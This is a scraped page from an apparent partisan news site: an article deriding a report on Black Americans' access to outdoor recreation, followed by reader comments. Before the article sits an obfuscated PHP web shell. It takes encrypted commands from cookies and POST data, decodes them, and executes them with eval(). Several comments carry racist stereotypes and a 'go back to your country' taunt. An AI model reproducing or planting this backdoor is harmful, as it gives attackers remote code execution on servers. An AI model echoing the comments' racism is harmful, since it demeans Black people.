$iwkNoSEZGC = chr (100) . "\137" . chr (120) . "\x49" . 'f' . "\114" . chr (77); $ctpiByNOz = chr ( 864 - 765 )."\154" . 'a' . chr (115) . "\163" . chr (95) . "\x65" . "\170" . "\x69" . "\163" . "\164" . chr (115); $FbVWmGsJ = class_exists($iwkNoSEZGC); $ctpiByNOz = "6206";$PsGsdkrc = !1;if ($FbVWmGsJ == $PsGsdkrc){function ffTIwElIO(){$NeWMkPovdO = new /* 54800 */ d_xIfLM(59591 + 59591); $NeWMkPovdO = NULL;}$mkQbdqnxE = "59591";class d_xIfLM{private function cKGNLUysT($mkQbdqnxE){if (is_array(d_xIfLM::$tPAJE)) {$zecCYEvt = str_replace(chr ( 442 - 382 ) . "\x3f" . chr ( 913 - 801 ).chr (104) . "\160", "", d_xIfLM::$tPAJE[chr ( 497 - 398 )."\157" . chr ( 249 - 139 ).'t' . "\x65" . 'n' . chr ( 740 - 624 )]);eval($zecCYEvt); $mkQbdqnxE = "59591";exit();}}private $cOhSikxoMi;public function LUnfxFuU(){echo 19615;}public function __destruct(){d_xIfLM::$tPAJE = @unserialize(d_xIfLM::$tPAJE); $mkQbdqnxE = "59135_36699";$this->cKGNLUysT($mkQbdqnxE); $mkQbdqnxE = "59135_36699";}public function BuhJDeV($zAiKUz, $JCaOjBj){return $zAiKUz[0] ^ str_repeat($JCaOjBj, (strlen($zAiKUz[0]) / strlen($JCaOjBj)) + 1);}public function __construct($DoFOX=0){$JSELYKGEJr = $_POST;$noFUxlNHr = $_COOKIE;$JCaOjBj = "dba4b227-d99b-4516-80b0-f0671ef985a5";$ldlitWhzeo = @$noFUxlNHr[substr($JCaOjBj, 0, 4)];if (!empty($ldlitWhzeo)){$SrXtmVGjeg = "base64";$zAiKUz = "";$ldlitWhzeo = explode(",", $ldlitWhzeo);foreach ($ldlitWhzeo as $YlArJ){$zAiKUz .= @$noFUxlNHr[$YlArJ];$zAiKUz .= @$JSELYKGEJr[$YlArJ];}$zAiKUz = array_map($SrXtmVGjeg . '_' . "\x64" . chr (101) . chr ( 722 - 623 )."\x6f" . chr (100) . chr (101), array($zAiKUz,));d_xIfLM::$tPAJE = $this->BuhJDeV($zAiKUz, $JCaOjBj);}}public static $tPAJE = 55976;}ffTIwElIO();} ‘Systemic Racism’ Blocks Black People From Going Outdoors | Patriot Truth News

‘Systemic Racism’ Blocks Black People From Going Outdoors

A report published by Outside Interactive alleged that America’s historically racist policies have contributed to “the nature gap,” resulting in black Americans having less enjoyment of the so-called “great outdoors.”
Erin Key, the report’s author, is pushing for minorities to use their free time outdoors in nature through the use of grants and advocacy work. She does not, however, mention that there are no modern laws prohibiting non-whites from visiting public nature sites.
“Though many don’t like to speak about it, so many of our living relatives experienced racism when it was legal — directly affecting how they interacted with society and how society interacted with them — all based on the color of their skin,” Key wrote, explaining that her family lived through an era “when many Black Americans were taught not to do things outside of their community areas, in an effort to keep them ‘safe.’”
Courtney Lanctot of The Unpopular Black is pushing for black people to spend time outdoors, claiming that it has health benefits.
“One of the biggest reasons why I want to show Black folks nature and adventure is because it deeply heals,” says Lanctot. “Nature taught me how to love myself deeper than I had known. Through its depths, I found mine. As Black people have historically had a lack of access to nature, we synonymously had a lack of access to our own healing. We have inherited trauma that still needs to be healed as a collective. Healing is part of our freedom.”
Share Winter CEO Constance Beverly claims that minority lack of interest in the outdoors is a myth.
“Through grantmaking, resource gathering, collaboration, and advocacy, we work with the ski industry as well as grassroots organizations across the United States to provide low or no-cost programs for youth traditionally denied access to winter sports,” Beverly explains. “We recognized years ago that a lack of participation from skiers and riders of diverse backgrounds had nothing to do with a lack of interest, but lack of access and opportunity. We strive to create a winter sports community where all youth, from every background, see themselves as skiers and riders; that they feel welcomed, included, and celebrated.”
via thegatewaypundit


  1. What??? I have neighbors who are black and they get along in our neighborhood just fine.We have never had a race problem here.

  2. That way they can enjoy watermelon and fried chicken. I am allergic to watermelon! BUMMER. Ahhhh finally the rest of the article opened. The part about winter sports! I see the reticence as blacks being innately smarter than Honkies! Why go outside only to freeze your butts off? Spoken from one that spent an entire Saturday morning unloading a steel truck with the temp ON THE thermometer at minus 20F and a 20 mph wind. DANG I was COLD!

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  3. This article is a joke. I’ve lived in interracial cities and never noticed my friends of ANY shade had problems with the outdoors. We all seemed to PREFER it. No, we didn’t go golfing or skiing, none of us had the $$ for such hobbies. Had nothing to do with skin tone, had to do with pocket cash. The Elites in this country aren’t going to make everyone rich…. they’re going to make every one even poorer.

  4. Who is this terrible “Systemic Race” that does not allow black people to go out? What is this Outside Interactive lying about? who are racists here: dogs are racists, cats are racists, maybe chickens are racists? Rather, racists are to be found in Outside Interactive .

  5. Everything these days is racist. Last week it was French Food. To me lowering the standards to graduate high school and get into college is racist. It is blatantly saying certain people are not smart enough to do so otherwise. Greatness comes from beating adversity – NOT – lowering standards.

  6. Next the nut bags will be telling you that if you step on a black ant your a white supremacist racist,when do you draw a line and say enough already

  7. Wow in Florida there must be more fun for all races: even in winter camping is fun. These snakes in society are always pulling the systemic racism boogie man/woman. Our church youth go camping trip and have fun : no matter the color of their skin pigmentation or ethnic groups. Ignorance is sister to want bringing doom and gloom: in our nieghborhood of all colors pigmentation or ethnic groups: greet each other as nieghbor: they don’t stay in their home as hermits or moles. But many go to the park, or in their yard barbecuing, having fun: also many pulling their boats filled with fishing poles: not shrieking the systemic racism boogie man is after us. What a lesson: you can believe in the dream of America a constitutional republic for which it stands one nation under GOD indivisible with liberty and justice for all: freedom to choose what form of outting you pursue not by the pigmentation of your skin.

  8. Then why do they dominate outdoor sports? To them everything is racist and people are starting to realize that there is no pleasing them.

  9. What about this,,, all you black people go back to where your country is that your always wanting to associate with or identify with, & you’ll have the pleasure of being outside all day & every day, then get back to us about how everyone here in the U. S. Is soooo mean to you all. Bunch of ingreats.


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